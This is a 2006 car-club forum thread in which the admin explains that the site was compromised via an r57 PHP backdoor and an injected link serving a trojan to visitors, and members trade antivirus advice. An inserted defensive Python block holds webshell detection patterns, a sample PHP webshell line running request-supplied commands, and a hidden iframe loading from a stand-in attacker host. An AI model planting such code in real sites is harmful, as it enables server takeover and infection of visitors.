
914World.com _ 914World Garage _ Latest Hacker/Virus attack ... Read This!

Posted by: SirAndy May 16 2006, 05:46 PM

just in case you missed all the fun, the 914club website was down for almost a week after we had been hacked/hijacked and a so called "Trojan" virus was planted on our server.

the intention of the virus was to be spread to our members computers to be able to gain control over as many computers as possible.

luckily, i catched it fairly quickly and shut down the site as a precaution while i was upgrading the system.

the system is once again virus free (for now) and hopefully stays that way.

if you are in doubt about your computer and you think you might have catched the virus, please, update your antivirus software to the latest version and do a full scan of your harddrive.

i'm sorry if this caused any of our members any trouble ...
beerchug.gif Andy

Posted by: (*)(*) May 16 2006, 06:35 PM

I vote we blame it on Texas boy.....

Oh ya gud yob Ahhhndy.

Posted by: Jeroen May 16 2006, 06:35 PM

booya! we're back

thanks for the good work Herr Andy!!!
have a rum-coke on me biggrin.gif

Posted by: trekkor May 16 2006, 06:37 PM

Glad to be back home.


KT

Posted by: MW 914 May 16 2006, 06:38 PM

I just woke from a horrible dream! I had this repeating nightmare that every day for a week I woke up and tried to log on and all I got was a splash page. It was horrible!! Glad it was only a dream....

Thanks Andy! beerchug.gif

Posted by: Gint May 16 2006, 06:40 PM

Damn! I was hoping for another week off!

Posted by: DonTraver May 16 2006, 06:43 PM

Thanks for your hard work Andy, it's appreciated.

Don

Posted by: dekman May 16 2006, 06:44 PM

Thank You! and all who helped........ clap56.gif

Posted by: URY914 May 16 2006, 06:47 PM

Andy you have done it again. THANK YOU.

Posted by: 396 May 16 2006, 06:49 PM

Thank you ..and those who initiated this virus - f OFF

Posted by: Aaron Cox May 16 2006, 07:01 PM

andy- just for fun. past tense of catch is caught. tongue.gif


thanks for all your hard work boss!

Posted by: grasshopper May 16 2006, 07:11 PM

grr...aaron said it before me! lol, just poking at you andy

Posted by: grasshopper May 16 2006, 07:13 PM

P.S. I got it before you shut the club down, and if anyone else cares, it takes control of your virus protection(mine was norton) and it will shut it down. Luckily, we have to virus protection systems, so the other one caught it. It could get nasty quick, so I would recommend checkin it out.

Posted by: sixnotfour May 16 2006, 07:15 PM

Good Job Andy

Posted by: riverman May 16 2006, 07:21 PM

Thanks Andy. And thanks to all those who helped Andy, too. Life is much better when the 914Club is around.

Posted by: jd74914 May 16 2006, 07:26 PM

QUOTE(grasshopper @ May 16 2006, 09:13 PM) *

P.S. I got it before you shut the club down, and if anyone else cares, it takes control of your virus protection(mine was norton) and it will shut it down. Luckily, we have to virus protection systems, so the other one caught it. It could get nasty quick, so I would recommend checkin it out.



wouldn't that be TWO laugh.gif

thanks andy beer3.gif

Posted by: drewvw May 16 2006, 07:32 PM


hot damn we're back! nice work as always andy beer3.gif

Posted by: jimtab May 16 2006, 07:49 PM

Andy, thanks for everything...I, and many others owe you many drinks...we're not worthy.... smiley_notworthy.gif smiley_notworthy.gif smiley_notworthy.gif smiley_notworthy.gif smiley_notworthy.gif

Posted by: pokey1168 May 16 2006, 07:55 PM

QUOTE((*)(*) @ May 16 2006, 07:35 PM) *

I vote we blame it on Texas boy.....


Not all of us are so bad.....but most of us do have guns ar15.gif

Posted by: rdauenhauer May 16 2006, 07:58 PM

Thanks Andy beer3.gif

Posted by: bondo May 16 2006, 08:00 PM

Thanks again! boldblue.gif

Posted by: ClayPerrine May 16 2006, 08:08 PM

QUOTE((*)(*) @ May 16 2006, 07:35 PM) *

I vote we blame it on Texas boy.....

Oh ya gud yob Ahhhndy.



finger.gif

Posted by: mack914 May 16 2006, 08:09 PM

Thanks for all the hard work... biggrin.gif

Posted by: grantsfo May 16 2006, 08:12 PM

Great work Andy! Thanks!

Posted by: Brad Roberts May 16 2006, 08:13 PM

Andy,

was it a name/password issue on the update page?


B

Posted by: SirAndy May 16 2006, 08:18 PM

QUOTE(Brad Roberts @ May 16 2006, 07:13 PM) *

was it a name/password issue on the update page?

nope ...

Posted by: Brett W May 16 2006, 08:19 PM

You Da Man. Thanks Andy.

Posted by: Headrage May 16 2006, 08:25 PM

Thanks Andy... jsharp.gif

Posted by: Grimstead May 16 2006, 08:27 PM

Thank You Sir!
clap56.gif
drunk.gif
beer.gif
beerchug.gif
beer3.gif
boldblue.gif
piratenanner.gif
mueba.gif
rocking nana.gif
smiley_notworthy.gif
thumb3d.gif
pray.gif

Posted by: markb May 16 2006, 08:28 PM

clap56.gif Thanks Andy!!

Posted by: Gary May 16 2006, 08:32 PM

Andy, you rock. Thanks for all the hard work! piratenanner.gif piratenanner.gif

Posted by: Mrs. K May 16 2006, 08:33 PM

QUOTE(Grimstead @ May 16 2006, 07:27 PM) *

Thank You Sir!
clap56.gif
drunk.gif
beer.gif
beerchug.gif
beer3.gif
boldblue.gif
piratenanner.gif
mueba.gif
rocking nana.gif
smiley_notworthy.gif
thumb3d.gif
pray.gif


thumb3d.gif thumb3d.gif thumb3d.gif
Exactly!
Thanks Andy! wub.gif

Lisa mrs.K.gif

Posted by: kwales May 16 2006, 08:35 PM

mueba.gif mueba.gif mrs.K.gif aktion035.gif jsharp.gif mueba.gif clap56.gif clap56.gif clap56.gif aktion035.gif Yaaaaayyyyyyy!!!!!!!! piratenanner.gif piratenanner.gif drunk.gif

Sor Ahndie does it again.....

In honor of your hard work and diligence, little kitty wanted the change to my avatar... happy11.gif


Ken

Posted by: Porsche Rescue May 16 2006, 09:01 PM

Andy, you and the site are appreciated.

Posted by: mikelsr May 16 2006, 09:04 PM

Dude you rock!

Posted by: 9146R May 16 2006, 09:06 PM

Andy,
You R da-man....thanks for your tireless efforts on our behalf....much appreciated. Missed this site big time.
Greg

Posted by: jonwatts May 16 2006, 09:08 PM

So far no Alpha so it looks like the patch is holding.

Thanks admin gang!

Posted by: turboman808 May 16 2006, 09:19 PM

It's about time. Here I was, just got my car and got a million questions, then the site goes down biggrin.gif

Posted by: MBowman325 May 16 2006, 09:22 PM

Finally get 'round to getting another 914, come to the site, and it was down! smile.gif Glad it's back up!

Posted by: bmcwilli May 16 2006, 09:22 PM

I've been running OSX on a powerbook for over 3 years. Nary a virus.

Apple just released an Intel Macbook for less than $1100. yes, it WILL run windows, and yes Windows on a mac is still insecure.

If you have no compelling reason that you MUST own a Wintel machine, check out the Mac.


Posted by: rick 918-S May 16 2006, 09:27 PM

Pheeewww! I thought I was out of here for a month...

Posted by: Scott Carlberg May 16 2006, 10:45 PM

Hey Andy,
why the FUCH are you apologizing? WTF.gif


Many have said it before me, many will say it AGAIN & AGAIN,

THANK YOU for ALL your hard work on this home, er, website! pray.gif pray.gif pray.gif

Posted by: eg914 May 16 2006, 10:45 PM

Not to be redundant (or repetitive) THANKS for all the hard work, this site is great!

Posted by: ppickerell May 16 2006, 10:59 PM

I hit my bookmark 2-3 times a day during the shutdown. But after seeing das pelikanpost I desisted, then checked my IP against the felony list and was relieved to see that I was clean. Thanks for all of your efforts.

Posted by: Midtowner May 17 2006, 12:15 AM

Thank you Andy! I really missed this place! clap56.gif clap56.gif clap56.gif

Posted by: Andyrew May 17 2006, 12:42 AM

*twitches*

Im

*twitch*

Recovering slowly from the site

*twitch*

being down..

Another week, and I would have died..

THANKS ANDY!!!!!!!!!!!!!!!!!!!!!*twitch*!!!!!!!!!!!!!!!!!!!

Posted by: ThinAir914 May 17 2006, 12:47 AM

Did this thing have a name?

Posted by: SirAndy May 17 2006, 01:21 AM

QUOTE(ThinAir914 @ May 16 2006, 11:47 PM) *

Did this thing have a name?


PHP Exploit called "r57 shell" ...
http://www.symantec.com/avcenter/venc/data/php.rstbackdoor.html

BUT that's only the part that infected the *server* ...

the part that infected the members computers is "Hacktool.IE.Exploit" ...


KMA.gif Andy

Posted by: Brad Roberts May 17 2006, 01:26 AM

It was listed back in 05? I *thought* I saw Norton running on the machine? Did Norton catch it?

Can I upload the McAfee client that you can monitor from anywhere?


B

Posted by: SirAndy May 17 2006, 01:38 AM

QUOTE(Brad Roberts @ May 17 2006, 12:26 AM) *

It was listed back in 05? I *thought* I saw Norton running on the machine? Did Norton catch it?
Can I upload the McAfee client that you can monitor from anywhere?

norton didn't catch it because there was nothing to catch (i'm talking about the server part here) ...
and McAfee would not have catched it either ...

the actual trojan that was downloaded to the members machines is pretty old, it's been around for a while ...

brad, i just told you on the phone how they got into the server. did you hear me say anything about them planting a "file" ?

the anti-virus software on the server never catched it because there was nothing to catch. by the time the guy was done, all that was left was a *link* in the main index page of this BBS to a hacker owned server that automatically downloaded the 2nd part of the attack to whomever was looking at the index page ...

they only used our server as a "host"
and all they hosted was a *link* to the actual backdoor trojan that resides on their own server ...

does this make any sense?

*NO* amount of anti-virus software on the server would have prevented this, BUT up to date anti-virus software on the viewers part would have catched the trojan.
as it did on my machine. i actually had windows defender go bezerk when i looked at the clubsite.
that's when i went and shut it down immediately ...

type.gif Andy
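
The two-stage pattern Andy lays out here (and the r57 shell he names a few posts up) is exactly the case where server-side anti-virus sees "nothing to catch": the server only carries a PHP backdoor and, afterwards, a single injected link in the index page. What does catch it is checking the site's own files. The script below is an added example for this thread, not the 914club site's code nor anything Andy or Brad posted; it shows three such checks in one place: crude indicator patterns for webshell-style PHP, a scan of a page's active content (script/iframe/embed/object) for hosts outside an allow-list, and a hash-baseline diff that names the edited page. The sample index page, the PHP snippets, the host attacker.invalid, the allow-list and the indicator patterns are all constructed for illustration and are not signatures for r57 or for the trojan named in the thread.

```python
"""Added example (not the 914club site's code nor anything posted in this thread).
Three defender-side checks for the attack pattern described in the thread:
a PHP backdoor (r57-style webshell) on the server, plus an injected link in the
BBS index page that hands every visitor to an attacker-controlled host.
Sample files, hosts and indicator patterns below are constructed assumptions."""
import hashlib
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# 1. Webshell indicators: crude, assumed patterns, not a signature for r57 or any tool.
WEBSHELL_PATTERNS = {
    "encoded eval": re.compile(
        r"\beval\s*\(\s*(?:base64_decode|gzinflate|str_rot13)\s*\(", re.I),
    "command execution": re.compile(
        r"\b(?:shell_exec|passthru|proc_open|popen|system|exec)\s*\(", re.I),
    "request-driven include": re.compile(
        r"\b(?:include|require)(?:_once)?\s*\(?\s*\$_(?:GET|POST|REQUEST)", re.I),
}


def webshell_indicators(php_source):
    """Return the names of indicator patterns that match a PHP file's text."""
    return [name for name, rx in WEBSHELL_PATTERNS.items() if rx.search(php_source)]


# 2. Injected active content in an HTML page (the "link" the thread describes).
class _RefCollector(HTMLParser):
    ACTIVE = {"script": "src", "iframe": "src", "embed": "src", "object": "data"}

    def __init__(self):
        super().__init__()
        self.refs = []  # (tag, url, hidden)

    def handle_starttag(self, tag, attrs):
        attr = self.ACTIVE.get(tag)
        if attr is None:
            return
        a = dict(attrs)
        url = a.get(attr)
        if url:
            # A 0x0 or 1x1 frame is the classic shape of a drive-by loader.
            hidden = a.get("width") in ("0", "1") or a.get("height") in ("0", "1")
            self.refs.append((tag, url, hidden))


def external_references(html, allowed_hosts):
    """Return (tag, url, hidden) for active content loaded from a host outside
    the allow-list. Relative URLs (no host part) are treated as first-party."""
    parser = _RefCollector()
    parser.feed(html)
    flagged = []
    for tag, url, hidden in parser.refs:
        host = urlparse(url).hostname
        if host is not None and host.lower() not in allowed_hosts:
            flagged.append((tag, url, hidden))
    return flagged


# 3. File-integrity diff: anti-virus has "nothing to catch" on the server, but a
#    baseline of content hashes shows exactly which page was edited or added.
def digest(content):
    return hashlib.sha256(content.encode()).hexdigest()


def changed_files(baseline, current):
    """baseline/current map path -> sha256 hex; report modified, added and removed paths."""
    modified = sorted(p for p in baseline if p in current and baseline[p] != current[p])
    added = sorted(p for p in current if p not in baseline)
    removed = sorted(p for p in baseline if p not in current)
    return {"modified": modified, "added": added, "removed": removed}


# Constructed samples (assumptions, not files from the real site).
CLEAN_INDEX = """<html><head><title>914club</title>
<script src="/forums/js/ipb.js"></script></head>
<body><img src="/style_images/logo.gif"></body></html>"""

INJECTED_INDEX = CLEAN_INDEX.replace(
    "<body>",
    '<body><iframe src="http://attacker.invalid/load.php" width="0" height="0"></iframe>')

BENIGN_PHP = "<?php echo htmlspecialchars($title); ?>"
SHELL_PHP = "<?php $c = $_REQUEST['cmd']; echo shell_exec($c); eval(base64_decode($_POST['p'])); ?>"

ALLOWED_HOSTS = {"www.914club.com"}  # assumed allow-list for first-party content


def demo():
    baseline = {"index.php": digest(CLEAN_INDEX)}
    current = {"index.php": digest(INJECTED_INDEX), "uploads/shell.php": digest(SHELL_PHP)}
    return {
        "refs_clean": external_references(CLEAN_INDEX, ALLOWED_HOSTS),
        "refs_injected": external_references(INJECTED_INDEX, ALLOWED_HOSTS),
        "php_benign": webshell_indicators(BENIGN_PHP),
        "php_shell": webshell_indicators(SHELL_PHP),
        "integrity": changed_files(baseline, current),
    }


if __name__ == "__main__":
    for name, result in demo().items():
        print(name, result)
```

On a real deployment the baseline would be taken from a known-clean copy of the BBS (a fresh install or backup) and the diff run on a schedule; the host allow-list should hold only the site's own hostnames and any CDN it deliberately uses, so that any other active-content source in the index page is a finding worth a look.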

Posted by: Brad Roberts May 17 2006, 01:48 AM

I understood how they did it, but I did not understand that it was a two piece Trojan. I don't recall us speaking about the hyperlink. I do understand how they have to "phone home".


B

Posted by: ablose58 May 17 2006, 06:05 AM

THANK YOU SO MUCH ANDY FOR ALL YOUR HARD WORK!!! piratenanner.gif drunk.gif beer3.gif beer.gif I'll buy ya a cold one @ WCC2006!! AL

Posted by: tdgray May 17 2006, 06:15 AM

Major Props Andy...

The fix is back :insertneedleinarmsmilie:

Posted by: alpha434 May 17 2006, 06:53 AM

I shut down my system just before you guys did, I guess. But after secluding the drive and scanning it, I found 2 trojans that had come from this site. One only manifests itself during boot to reinstall something else. I deleted a considerable number of files that were infected. Neither Norton nor AVG detected the second trojan. I used Avast! as a third checker and it got 7 files.

I suppose that it may not have actually come from this site. Just that my computer was infected with both on the same day/time. Might be a good idea to check for another trojan, though.

Posted by: william harris May 17 2006, 07:34 AM

pray.gif Thank you Andy. The days without this site SUCK! pray.gif

Posted by: maxwelj May 17 2006, 07:42 AM

At the risk of dating myself....Far Out!.. Now I can decompress..

Thanks Andy..We don't appreciate you enough!


Posted by: Bartlett 914 May 17 2006, 07:43 AM

My engine is blown, the weather has been cold and rainy and the site was down. What a nightmare! Now, thanks, the site is up, it is sunny and warm. Did you do that too?

Thanks for the hard work Andy. It is so good to be back online.

Mark

Posted by: bmunday May 17 2006, 08:17 AM

Thanks Andy!!!!! beerchug.gif pray.gif

Posted by: fiid May 17 2006, 08:28 AM

Thanks Andy - must have been a lot of hard work - I'll get you a beer next time we hang out smile.gif

Posted by: Part Pricer May 17 2006, 08:39 AM



I've noticed that we have a new version of IPB. That should thwart the google-hackers.





Posted by: Howard May 17 2006, 09:00 AM

I couldn't get on here after 8pm last night, but works fine this morning. Any idea what the problem was/is? Should I be looking for a bug in my system?

Posted by: mikerose May 17 2006, 09:02 AM

beer3.gif Thanks Andy smoke.gif

Mike

Posted by: SirAndy May 17 2006, 11:08 AM

QUOTE(Howard @ May 17 2006, 08:00 AM) *

Should I be looking for a bug in my system?
yes. in fact, i want *everyone* to scan and double-scan their computers. and not just for the virus i mentioned, like alpha said, there could be more by now.

everybody, please, do a *full* scan of your harddrive ...

smile.gif Andy

Posted by: GTeener May 17 2006, 03:29 PM

Thank you Andy for all your hard work getting us back together. beerchug.gif

You rock dude! aktion035.gif

Posted by: cantley914 May 17 2006, 03:56 PM


QUOTE(GTeener @ May 17 2006, 01:29 PM) *

Thank you Andy for all your hard work getting us back together. beerchug.gif

You rock dude! aktion035.gif



agree.gif

Thanks Andy

We can`t thank you enough.
We appreciate your hard work.

Steph

Posted by: JB 914 May 18 2006, 11:23 PM

many of the viruses these online banking crooks are using blow thru Norton like it's not even there. I've got a netopia router, Norton AV corporate that updates constantly and Windows defender. none of them went off. i had to find mine thru trial and error. then i confirmed it with: http://www.sysinternals.com/Utilities/RootkitRevealer.html

Rootkits are some scary stuff. I'm formatting all my PC's just to be safe.

i also installed winpatrol and ewido anti malware.

Posted by: jasons May 18 2006, 11:57 PM

Is this thing Windows specific? I surf on Linux ph34r.gif cool_shades.gif

Posted by: JB 914 May 19 2006, 12:14 AM

I think Rootkits originated in linux.

Posted by: tiim5 May 19 2006, 12:29 AM

What should Mac OS X folks do about this?

Posted by: SirAndy May 19 2006, 10:22 AM

QUOTE(tiim5 @ May 18 2006, 11:29 PM) *

What should Mac OS X folks do about this?

with this one, you *should* be fine, as should any linux users ...

but, if you have any anti-virus software, i'd still run a full check ...
type.gif Andy

Powered by Invision Power Board (http://www.invisionboard.com)
© Invision Power Services (http://www.invisionpower.com)